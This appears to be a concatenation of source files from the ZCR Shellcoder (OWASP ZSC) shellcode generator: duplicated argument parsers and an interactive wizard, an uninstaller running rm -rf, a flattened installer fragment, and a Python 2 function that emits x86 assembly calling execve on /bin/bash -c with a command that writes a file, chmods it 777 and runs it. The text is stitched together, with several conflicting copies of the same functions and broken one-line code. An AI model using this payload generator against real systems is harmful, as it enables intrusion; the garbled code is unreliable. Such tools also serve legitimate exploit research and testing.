def main():
    '''
    Entry point of ZCR Shellcoder.

    With no command-line arguments the start page is shown. Otherwise
    the arguments are checked: accepted input is handed to the analyser
    and the software signature is printed, rejected input is reported
    through start.inputcheck().
    '''
    # executed without any argv: show the start page
    if argv_control.exist() is not True:
        start.start()
        return
    # argv was not entered accurately: report it
    if argv_control.check() is not True:
        start.inputcheck()
        return
    # argv accepted: generate, then print the software signature
    analyser.do(argv_control.run())
    start.sig()
def main():
    '''
    Main function of ZCR Shellcoder.

    Shows the start page and exits with status 0 when no arguments were
    given; otherwise checks the arguments and either runs the analyser
    on them or reports the bad input.
    '''
    if argv_control.exist() is not True:
        start.start()
        sys.exit(0)
    # exist() is asked again before the arguments are looked at
    if argv_control.exist() is not True:
        return
    if argv_control.check() is True:
        analyser.do(argv_control.run())
        start.sig()
    else:
        start.inputcheck()
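def run():
    '''
    Read the four generator options from sys.argv and pack them into the
    single string handed to the analyser.

    Each of the flags -os, -o, -job and -encode is expected to be
    followed by its value. When a flag is missing, repeated in place of
    another one, or is the last argument, start.inputcheck() is called
    and False is returned.

    Returns:
        The OS name, output filename, encode type and job joined by
        three 0x90 bytes, or False when the input is rejected.
    '''
    # index of the value that follows each flag; 0 means "flag not seen"
    value_index = {'-os': 0, '-o': 0, '-job': 0, '-encode': 0}
    flags_seen = 0
    for position, argument in enumerate(sys.argv):
        if argument in value_index:
            flags_seen += 1
            value_index[argument] = position + 1

    # Counting four flags is not enough on its own: a repeated flag can
    # reach four while another is absent (index 0 would then validate
    # sys.argv[0]), and a trailing flag points one past the end of argv.
    complete = flags_seen == 4 and all(
        0 < index < len(sys.argv) for index in value_index.values())
    if not complete:
        start.inputcheck()
        # start.inputcheck() is defined elsewhere; if it returns, stop
        # here instead of indexing argv with unusable positions
        return False

    os_name = sys.argv[value_index['-os']]
    filename = sys.argv[value_index['-o']]
    encode = sys.argv[value_index['-encode']]
    job = sys.argv[value_index['-job']]

    if start.oslist(os_name) is not True:
        return False
    if start.types(encode) is not True:
        return False
    if start.joblist(job) is not True:
        return False

    # Writability probe for the output path. Mode 'w' truncates a file
    # that already exists at that path, before anything is generated.
    try:
        with open(filename, 'w') as writer:
            writer.write('')
    except (IOError, OSError):
        print(
            color.color('red') +
            'File is not writable, Try other name or change directory' +
            color.color('reset'))
        sys.exit(start.sig())

    return (os_name + '\x90\x90\x90' + filename + '\x90\x90\x90' +
            encode + '\x90\x90\x90' + job)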
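def run():
    '''
    Pick the values of -os, -o, -job and -encode out of sys.argv and
    return them as one string for the analyser.

    The value of a flag is the argument right after it. Input that lacks
    one of the four flags, or has a flag with no argument after it, is
    reported through start.inputcheck() and yields False.

    Returns:
        The OS name, output filename, encode type and job joined by
        three 0x90 bytes, or False when a check fails.
    '''
    counter = 0
    os_counter = 0
    filename_counter = 0
    job_counter = 0
    encode_counter = 0
    for total_counter, argv_check in enumerate(sys.argv):
        if argv_check == '-os':
            counter += 1
            os_counter = total_counter + 1
        elif argv_check == '-o':
            counter += 1
            filename_counter = total_counter + 1
        elif argv_check == '-job':
            counter += 1
            job_counter = total_counter + 1
        elif argv_check == '-encode':
            counter += 1
            encode_counter = total_counter + 1

    positions = (os_counter, filename_counter, job_counter, encode_counter)
    # checkargv is always bound here; comparing with == avoids relying on
    # integer identity. A position of 0 means the flag never appeared and
    # a position equal to len(sys.argv) means it was the last argument.
    checkargv = counter == 4 and all(
        0 < position < len(sys.argv) for position in positions)
    if checkargv is False:
        start.inputcheck()
        # start.inputcheck() is defined elsewhere; should it return, the
        # positions above must not be used to index sys.argv
        return False

    if start.oslist(sys.argv[os_counter]) is not True:
        return False
    if start.types(sys.argv[encode_counter]) is not True:
        return False
    if start.joblist(sys.argv[job_counter]) is not True:
        return False

    # Opening with 'w' empties an existing file at the output path; the
    # with-block closes the handle even when the write fails.
    try:
        with open(sys.argv[filename_counter], 'w') as writer:
            writer.write('')
    except (IOError, OSError):
        print(color.color('red') +
              'File is not writable, Try other name or change directory' +
              color.color('reset'))
        sys.exit(start.sig())

    os_name = sys.argv[os_counter]
    filename = sys.argv[filename_counter]
    encode = sys.argv[encode_counter]
    job = sys.argv[job_counter]
    content = (os_name + '\x90\x90\x90' + filename + '\x90\x90\x90' +
               encode + '\x90\x90\x90' + job)
    return content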
def run(filename,content,command):
    '''
    Return assembly text for a payload whose shell line recreates a local
    file under another name, makes it executable and runs a command.

    filename -- path the generated shell line writes to
    content  -- path of the local file whose bytes are embedded
    command  -- command appended to the shell line; the token '[space]'
                stands for a space

    When the file named by content cannot be read, an error is printed,
    start.sig() is called and the process exits with status 0.

    NOTE(review): Python 2 only as written - print statement,
    str.encode('hex') and integer division with '/'.
    '''
    command = command.replace('[space]',' ')
    try:
        # hex digits of the local file's content; the file is opened in
        # text mode and the handle is never closed explicitly
        cont = binascii.b2a_hex(open(content).read())
    except:
        # NOTE(review): bare except - every failure, not only a missing
        # file, is reported as "Cannot find/open"
        from core import start
        print 'Error, Cannot find/open the file %s'%(content)
        start.sig()
        sys.exit(0)
    l = len(cont) -1 # not used below
    n = 0
    c = '\\x'
    # put a literal backslash-x in front of every pair of hex digits
    for word in cont:
        c += word
        n+=1
        # NOTE(review): 'is' compares identity; it matches == here only
        # because of small-integer caching
        if n is 2:
            n = 0
            c += '\\x'
    c = c[:-2] # drop the dangling backslash-x left after the last pair
    # Shell line carried by the payload: write the bytes with echo -e,
    # chmod 777 the file, then run command. filename and command are
    # interpolated unquoted, and mode 777 leaves the written file
    # writable and executable by every user on the host.
    command = 'echo -e "%s" > %s ; chmod 777 %s ; %s'%(str(c),str(filename),str(filename),str(command))
    m = len(command) - 1
    stack = ''
    # reverse the shell line character by character
    while(m>=0):
        stack += command[m]
        m -= 1
    stack = stack.encode('hex')
    shr_counter = 0
    # stack now holds hex digits, 8 per 32-bit word; the remainder tells
    # how many digits the leading word is short of a full word
    shr_counter = len(stack) % 8
    zshr_counter = shr_counter # not used below
    shr = None
    # Each case pads the leading digits to a full word with 90 bytes and
    # keeps the instructions that shift those padding bytes out again
    # (24, 16 or 8 bits for three, two or one padding byte).
    if shr_counter is 2:
        shr = '\npop %ecx\nshr $0x10,%ecx\nshr $0x8,%ecx\npush %ecx\n'
        stack = stack[0:2] + '909090' + stack[2:]
    if shr_counter is 4:
        shr = '\npop %ecx\nshr $0x10,%ecx\npush %ecx\n'
        stack = stack[0:4] + '9090' + stack[4:]
    if shr_counter is 6:
        shr = '\npop %ecx\nshr $0x8,%ecx\npush %ecx\n'
        stack = stack[0:6] + '90' + stack[6:]
    zshr = shr
    m = len(stack)
    n = len(stack) / 8 # number of 8-digit words (integer division in Python 2)
    file_shellcode = ''
    shr_counter = len(stack) % 8 # 0 after the padding above
    if shr_counter is 0:
        shr_n = 0 # counted but not read afterwards
        r = '' # not used below
        # Walk the hex string from its end in 8-digit slices, prepending
        # one push per slice so the first slice ends up on the first line.
        while(n is not 0):
            if shr is not None:
                shr_n += 1
                zx = m - 8
                file_shellcode = 'push $0x' + str(stack[zx:m]) + '\n' + file_shellcode
                m -= 8
                n = n - 1
                shr = None
            # shr was just cleared above, so on the first pass with
            # padding both branches run and two pushes are emitted
            # NOTE(review): if n were 1 on that pass it would step past 0
            # and 'n is not 0' would never become false - confirm that
            # the shell line is always long enough
            if shr is None:
                shr_n += 1
                zx = m - 8
                file_shellcode = 'push $0x' + str(stack[zx:m]) + '\n' + file_shellcode
                m -= 8
                n = n - 1
    if zshr is None:
        file_z = file_shellcode
    if zshr is not None:
        # the first 16 characters are the first push line without its
        # newline ('push $0x' plus 8 digits); the shift sequence is
        # appended right after it
        rep1 = file_shellcode[:16]
        rep2 = rep1 + zshr
        # NOTE(review): replace() has no count argument, so an identical
        # push line further down would receive the shift sequence too
        file_z = file_shellcode.replace(rep1,rep2)
    # The generated pushes are spliced into the fixed template at %s;
    # %% is a literal percent sign.
    # NOTE(review): in this listing the template sits on one line; the
    # instructions were presumably one per line in the original file -
    # confirm against upstream before relying on the literal.
    shellcode = '''push $0xb pop %%eax cltd push %%edx %s mov %%esp,%%esi push %%edx push $0x632d9090 pop %%ecx shr $0x10,%%ecx push %%ecx mov %%esp,%%ecx push %%edx push $0x68 push $0x7361622f push $0x6e69622f mov %%esp,%%ebx push %%edx push %%edi push %%esi push %%ecx push %%ebx mov %%esp,%%ecx int $0x80 '''%(str(file_z))
    return shellcode
def check():
    '''
    Validate the command line and serve the single-switch commands.

    With exactly one argument the switch is dispatched to the matching
    start.* function; '-wizard' prompts for OS name, job, encode type and
    output filename, hands the packed string to analyser.do() and exits.
    With more than one argument the four flags -os, -o, -job and -encode
    must all be present and their values accepted by start.*.

    Returns True when the input is accepted and False otherwise. When
    sys.argv holds only the program name neither branch runs and the
    function returns None.
    '''
    checkargv = False
    # NOTE(review): 'is' on integers compares identity; it behaves like
    # == here only because of small-integer caching
    if len(sys.argv) is 2:
        # start.oslist/joblist/types are called with 1 here and with a
        # name further down - presumably 1 prints the list; confirm in
        # core.start
        if str(sys.argv[1]) == '-oslist':
            checkargv = True
            start.oslist(1)
        if str(sys.argv[1]) == '-joblist':
            checkargv = True
            start.joblist(1)
        if str(sys.argv[1]) == '-types':
            checkargv = True
            start.types(1)
        if str(sys.argv[1]) == '-h':
            checkargv = True
            start.menu()
        if str(sys.argv[1]) == '--h':
            checkargv = True
            start.menu()
        if str(sys.argv[1]) == '-help':
            checkargv = True
            start.menu()
        if str(sys.argv[1]) == '--help':
            checkargv = True
            start.menu()
        if str(sys.argv[1]) == '-update':
            checkargv = True
            start.update()
        if str(sys.argv[1]) == '-about':
            checkargv = True
            start.about()
        if str(sys.argv[1]) == '-wizard':
            checkargv = True
            start.zcr()
            try:
                # t keeps each prompt loop running until a value is accepted
                t = True
                print ('\n'+color.color('yellow')+'Default OS Name is linux_x86, Enter OS Name or Enter "list" to see OS List')
                while t:
                    # version is a module-level name; if it is neither 2
                    # nor 3 osname stays unbound and the NameError is
                    # caught by the bare except below
                    if version is 2:
                        osname = raw_input(color.color('cyan')+'OS Name: '+color.color('white')).replace('\n','')
                    if version is 3:
                        osname = input(color.color('cyan')+'OS Name: '+color.color('white')).replace('\n','')
                    if osname == '':
                        osname = 'linux_x86'
                    # the local name check shadows this function's own
                    # name inside its body
                    check = start.oslist(osname)
                    if osname == 'list':
                        start.os_names_list()
                        # 1 marks "list shown": neither accepted nor wrong
                        check = 1
                    if check is True:
                        print (color.color('blue')+'OS Name set to "%s%s%s"'%(color.color('red'),osname,color.color('blue')))
                        t = False
                    if check is not True and check is not 1:
                        print (color.color('red')+'Wrong Input' )
                t = True
                print ('\n'+color.color('yellow')+'Default Job is exec(\'/bin/bash\'), Enter Job Type or Enter "list" to see Jobs List')
                while t:
                    if version is 2:
                        job = raw_input(color.color('cyan')+'Job:'+color.color('white')).replace('\n','')
                    if version is 3:
                        job = input(color.color('cyan')+'Job:'+color.color('white')).replace('\n','')
                    if job == '':
                        job = 'exec(\'/bin/bash\')'
                    check = start.job_check(job)
                    if job == 'list':
                        start.job_list()
                        check = 1
                    if check is True:
                        print (color.color('blue')+'Job set to "%s%s%s"'%(color.color('red'),job,color.color('blue')))
                        t = False
                    if check is not True and check is not 1:
                        print (color.color('red')+'Wrong Input')
                t = True
                print ('\n'+color.color('yellow')+'Default Encode Type is none, Enter Encode Type or Enter "list" to see Encodes List')
                while t:
                    if version is 2:
                        encode = raw_input(color.color('cyan')+'Encode:'+color.color('white')).replace('\n','')
                    if version is 3:
                        encode = input(color.color('cyan')+'Encode:'+color.color('white')).replace('\n','')
                    if encode == '':
                        encode = 'none'
                    check = start.encode_name_check(encode)
                    if encode == 'list':
                        start.encode_name()
                        check = 1
                    if check is True:
                        print (color.color('blue')+'Encode Type set to "%s%s%s"'%(color.color('red'),encode,color.color('blue')))
                        t = False
                    if check is not True and check is not 1:
                        print (color.color('red')+'Wrong Input')
                t = True
                print ('\n'+color.color('yellow')+'Default Filename is shellcode.c, Enter Filename or Just Enter to skip')
                while t:
                    if version is 2:
                        filename = raw_input(color.color('cyan')+'Filename: '+color.color('white')).replace('\n','')
                    if version is 3:
                        filename = input(color.color('cyan')+'Filename: '+color.color('white')).replace('\n','')
                    if filename == '':
                        filename = 'shellcode.c'
                    check = False
                    # Writability probe. Mode 'w' truncates a file that
                    # already exists at the entered path, so answering
                    # the prompt is enough to empty that file.
                    try:
                        file = open(filename,'w')
                        file.write('')
                        file.close()
                        check = True
                    except:
                        check = False
                    if check is True:
                        print (color.color('blue')+'Filename set to "%s%s%s"'%(color.color('red'),filename,color.color('blue')))
                        t = False
                    if check is False:
                        print (color.color('red')+'File is not writable, Try other name or change directory')
            except (KeyboardInterrupt, SystemExit):
                sys.exit('\n\nAborted by user.\n')
            # NOTE(review): the bare except reports every other error in
            # the wizard, programming errors included, as a user abort
            except:
                sys.exit('\n\nAborted by user.\n')
            # the values were already accepted by the *_check helpers
            # above; they are validated once more with the same start.*
            # functions the flag-based path uses
            checkargv = True
            if start.oslist(osname) is not True:
                checkargv = False
            if start.types(encode) is not True:
                checkargv = False
            if start.joblist(job) is not True:
                checkargv = False
            if checkargv is False:
                # execution continues below if inputcheck() returns -
                # presumably it exits; confirm in core.start
                start.inputcheck()
            # four fields joined by three 0x90 bytes, the same layout
            # analyser.do() receives from the flag-based path
            content = osname + '\x90\x90\x90' + filename + '\x90\x90\x90' + encode + '\x90\x90\x90' + job
            analyser.do(content)
            sys.exit(start.sig())
        if checkargv is False:
            start.inputcheck()
        return checkargv
    if len(sys.argv) > 2:
        checkargv = True
        # a single-switch command mixed into a longer command line is
        # rejected ('-about' is not part of this list)
        for argv_check in sys.argv:
            if argv_check == '-h':
                checkargv = False
            if argv_check == '--h':
                checkargv = False
            if argv_check == '-help':
                checkargv = False
            if argv_check == '--help':
                checkargv = False
            if argv_check == '-types':
                checkargv = False
            if argv_check == '-oslist':
                checkargv = False
            if argv_check == '-joblist':
                checkargv = False
            if argv_check == '-update':
                checkargv = False
            if argv_check == '-wizard':
                checkargv = False
        if checkargv is False:
            start.inputcheck()
        checkargv = False
        counter = 0
        total_counter = 0
        os_counter = 0
        filename_counter = 0
        job_counter = 0
        encode_counter = 0
        # remember, for each flag, the index of the argument after it
        for argv_check in sys.argv:
            if argv_check == '-os':
                counter += 1
                os_counter = total_counter + 1
            if argv_check == '-o':
                counter += 1
                filename_counter = total_counter + 1
            if argv_check == '-job':
                counter += 1
                job_counter = total_counter + 1
            if argv_check == '-encode':
                counter += 1
                encode_counter = total_counter + 1
            total_counter += 1
        # counter counts occurrences, so a repeated flag can reach 4
        # while another flag is missing and its index is still 0
        if counter is 4:
            checkargv = True
        if checkargv is False:
            start.inputcheck()
        checkargv = False
        # NOTE(review): a flag given as the last argument makes its index
        # equal to len(sys.argv) and the lookups below raise IndexError
        if start.oslist(sys.argv[os_counter]) is not True:
            return checkargv
        if start.types(sys.argv[encode_counter]) is not True:
            return checkargv
        if start.joblist(sys.argv[job_counter]) is not True:
            return checkargv
        checkargv = True
        return checkargv
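#!/usr/bin/env python
'''
ZCR Shellcoder

ZeroDay Cyber Research
Z3r0D4y.Com
Ali Razmjoo
'''
# Uninstaller: deletes the installed copy under /usr/share/owasp_zsc and
# the /usr/bin/zsc launcher. Linux only.
import os
import sys
from core import start
from core import color

if 'linux' not in sys.platform:
    sys.exit(
        color.color('red') +
        'Sorry, This version of software just could be run on linux.' +
        color.color('reset'))
os.system('clear')
start.zcr()
print(color.color('green') + 'Removing Files' + color.color('white'))
# Both paths are fixed literals, so nothing user-supplied reaches the
# shell. rm -rf stays silent about paths that do not exist but returns a
# non-zero status when a path could not be deleted (for example when the
# script lacks permission under /usr).
status = os.system('rm -rf /usr/share/owasp_zsc /usr/bin/zsc')
if status != 0:
    # success is reported only when rm itself reported success
    print(
        color.color('red') +
        'Files could not be removed, check your permissions' +
        color.color('white'))
else:
    print(color.color('green') + 'Files Removed!' + color.color('white'))
start.sig()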
except: pass print(color.color('green') + 'Copying Files' + color.color('white')) tmp_copy = os.popen('xcopy /y /s /i . %s' % installing_path).read() print(color.color('cyan') + 'Building Commandline') tmp_add_command_line = open('%s\\..\\zsc.bat' % installing_path, 'w') tmp_add_command_line.write('@echo off\npython %s\\zsc.py %%*' % installing_path) tmp_add_command_line.close() print( color.color('yellow') + '\nNow you can remove this folder\nfiles copied in %s.\nto run zcr shellcoder please use "zsc" command line\nNOTE: IF COMMAND LINE "zsc" NOT FOUND, PLEASE RE-OPEN YOUR CMD!\n' % installing_path + color.color('reset')) if 'linux' in sys.platform: os.system('clear') linux() elif 'darwin' in sys.platform: os.system('clear') osx() elif 'win32' in sys.platform or 'win64' in sys.platform: os.system('cls') windows() else: sys.exit( color.color('red') + 'OWASP ZSC currently supports install on windows/linux/osx only, for other platforms please copy source files to a directory and run' + color.color('reset')) start.sig()
def check():
    '''
    Check sys.argv and run the commands that consist of a single switch.

    One argument: the switch (-oslist, -joblist, -types, the help
    variants, -update, -about, -wizard) is dispatched to start.*. The
    wizard asks for OS name, job, encode type and output filename, passes
    the packed string to analyser.do() and exits the process.
    Several arguments: -os, -o, -job and -encode must all appear and the
    values after them must be accepted by start.oslist/types/joblist.

    Returns True for accepted input, False for rejected input, and None
    when sys.argv contains only the program name (neither branch runs).
    '''
    checkargv = False
    # NOTE(review): identity comparison on an integer; equals == only
    # through small-integer caching
    if len(sys.argv) is 2:
        # the argument 1 presumably asks start.* to print its list -
        # confirm in core.start
        if str(sys.argv[1]) == '-oslist':
            checkargv = True
            start.oslist(1)
        if str(sys.argv[1]) == '-joblist':
            checkargv = True
            start.joblist(1)
        if str(sys.argv[1]) == '-types':
            checkargv = True
            start.types(1)
        if str(sys.argv[1]) == '-h':
            checkargv = True
            start.menu()
        if str(sys.argv[1]) == '--h':
            checkargv = True
            start.menu()
        if str(sys.argv[1]) == '-help':
            checkargv = True
            start.menu()
        if str(sys.argv[1]) == '--help':
            checkargv = True
            start.menu()
        if str(sys.argv[1]) == '-update':
            checkargv = True
            start.update()
        if str(sys.argv[1]) == '-about':
            checkargv = True
            start.about()
        if str(sys.argv[1]) == '-wizard':
            checkargv = True
            start.zcr()
            try:
                # each prompt loop repeats while t is True
                t = True
                print('\n' + color.color('yellow') + 'This version has one OS available which is linux_x86 (by Default), Enter OS Name or Enter "list" to see future OS List')
                while t:
                    # version comes from module scope; with a value other
                    # than 2 or 3 osname is never assigned and the
                    # resulting NameError ends in the bare except below
                    if version is 2:
                        osname = raw_input(color.color('cyan') + 'OS Name: ' + color.color('white')).replace('\n', '')
                    if version is 3:
                        osname = input(color.color('cyan') + 'OS Name: ' + color.color('white')).replace('\n', '')
                    if osname == '':
                        osname = 'linux_x86'
                    # this local hides the function's own name check
                    check = start.oslist(osname)
                    if osname == 'list':
                        start.os_names_list()
                        # 1 = list was shown, ask again without an error
                        check = 1
                    if check is True:
                        print(color.color('blue') + 'OS Name set to "%s%s%s"' % (color.color('red'), osname, color.color('blue')))
                        t = False
                    if check is not True and check is not 1:
                        print(color.color('red') + 'Wrong Input')
                t = True
                print('\n' + color.color('yellow') + 'Default Job is exec(\'/bin/bash\'), Enter Job Type or Enter "list" to see Jobs List')
                while t:
                    if version is 2:
                        job = raw_input(color.color('cyan') + 'Job:' + color.color('white')).replace('\n', '')
                    if version is 3:
                        job = input(color.color('cyan') + 'Job:' + color.color('white')).replace('\n', '')
                    if job == '':
                        job = 'exec(\'/bin/bash\')'
                    check = start.job_check(job)
                    if job == 'list':
                        start.job_list()
                        check = 1
                    if check is True:
                        print(color.color('blue') + 'Job set to "%s%s%s"' % (color.color('red'), job, color.color('blue')))
                        t = False
                    if check is not True and check is not 1:
                        print(color.color('red') + 'Wrong Input')
                t = True
                print('\n' + color.color('yellow') + 'Default Encode Type is none, Enter Encode Type or Enter "list" to see Encodes List')
                while t:
                    if version is 2:
                        encode = raw_input(color.color('cyan') + 'Encode:' + color.color('white')).replace('\n', '')
                    if version is 3:
                        encode = input(color.color('cyan') + 'Encode:' + color.color('white')).replace('\n', '')
                    if encode == '':
                        encode = 'none'
                    check = start.encode_name_check(encode)
                    if encode == 'list':
                        start.encode_name()
                        check = 1
                    if check is True:
                        print(color.color('blue') + 'Encode Type set to "%s%s%s"' % (color.color('red'), encode, color.color('blue')))
                        t = False
                    if check is not True and check is not 1:
                        print(color.color('red') + 'Wrong Input')
                t = True
                print('\n' + color.color('yellow') + 'Default Filename is shellcode.c, Enter Filename or Just Enter to skip')
                while t:
                    if version is 2:
                        filename = raw_input(color.color('cyan') + 'Filename: ' + color.color('white')).replace('\n', '')
                    if version is 3:
                        filename = input(color.color('cyan') + 'Filename: ' + color.color('white')).replace('\n', '')
                    if filename == '':
                        filename = 'shellcode.c'
                    check = False
                    # Probe that the path is writable. Opening with 'w'
                    # empties an existing file at that path as a side
                    # effect of the probe.
                    try:
                        file = open(filename, 'w')
                        file.write('')
                        file.close()
                        check = True
                    except:
                        check = False
                    if check is True:
                        print(color.color('blue') + 'Filename set to "%s%s%s"' % (color.color('red'), filename, color.color('blue')))
                        t = False
                    if check is False:
                        print(color.color('red') + 'File is not writable, Try other name or change directory')
            except (KeyboardInterrupt, SystemExit):
                sys.exit('\n\nAborted by user.\n')
            # NOTE(review): any other exception raised in the wizard is
            # also reported as a user abort, which hides real errors
            except:
                sys.exit('\n\nAborted by user.\n')
            # second validation pass, with the start.* functions that the
            # flag-based path also uses
            checkargv = True
            if start.oslist(osname) is not True:
                checkargv = False
            if start.types(encode) is not True:
                checkargv = False
            if start.joblist(job) is not True:
                checkargv = False
            if checkargv is False:
                # the lines below still run if inputcheck() returns -
                # presumably it exits; confirm in core.start
                start.inputcheck()
            # OS name, filename, encode type and job, separated by three
            # 0x90 bytes
            content = osname + '\x90\x90\x90' + filename + '\x90\x90\x90' + encode + '\x90\x90\x90' + job
            analyser.do(content)
            sys.exit(start.sig())
        if checkargv is False:
            start.inputcheck()
        return checkargv
    if len(sys.argv) > 2:
        checkargv = True
        # single-switch commands are not allowed inside a longer command
        # line ('-about' is not in this list)
        for argv_check in sys.argv:
            if argv_check == '-h':
                checkargv = False
            if argv_check == '--h':
                checkargv = False
            if argv_check == '-help':
                checkargv = False
            if argv_check == '--help':
                checkargv = False
            if argv_check == '-types':
                checkargv = False
            if argv_check == '-oslist':
                checkargv = False
            if argv_check == '-joblist':
                checkargv = False
            if argv_check == '-update':
                checkargv = False
            if argv_check == '-wizard':
                checkargv = False
        if checkargv is False:
            start.inputcheck()
        checkargv = False
        counter = 0
        total_counter = 0
        os_counter = 0
        filename_counter = 0
        job_counter = 0
        encode_counter = 0
        # for every flag, store the index of the argument that follows it
        for argv_check in sys.argv:
            if argv_check == '-os':
                counter += 1
                os_counter = total_counter + 1
            if argv_check == '-o':
                counter += 1
                filename_counter = total_counter + 1
            if argv_check == '-job':
                counter += 1
                job_counter = total_counter + 1
            if argv_check == '-encode':
                counter += 1
                encode_counter = total_counter + 1
            total_counter += 1
        # occurrences are counted, not distinct flags: one flag given
        # twice can bring the count to 4 while another is absent and its
        # index still 0
        if counter is 4:
            checkargv = True
        if checkargv is False:
            start.inputcheck()
        checkargv = False
        # NOTE(review): when a flag is the last argument its stored index
        # is len(sys.argv) and the lookups below raise IndexError
        if start.oslist(sys.argv[os_counter]) is not True:
            return checkargv
        if start.types(sys.argv[encode_counter]) is not True:
            return checkargv
        if start.joblist(sys.argv[job_counter]) is not True:
            return checkargv
        checkargv = True
        return checkargv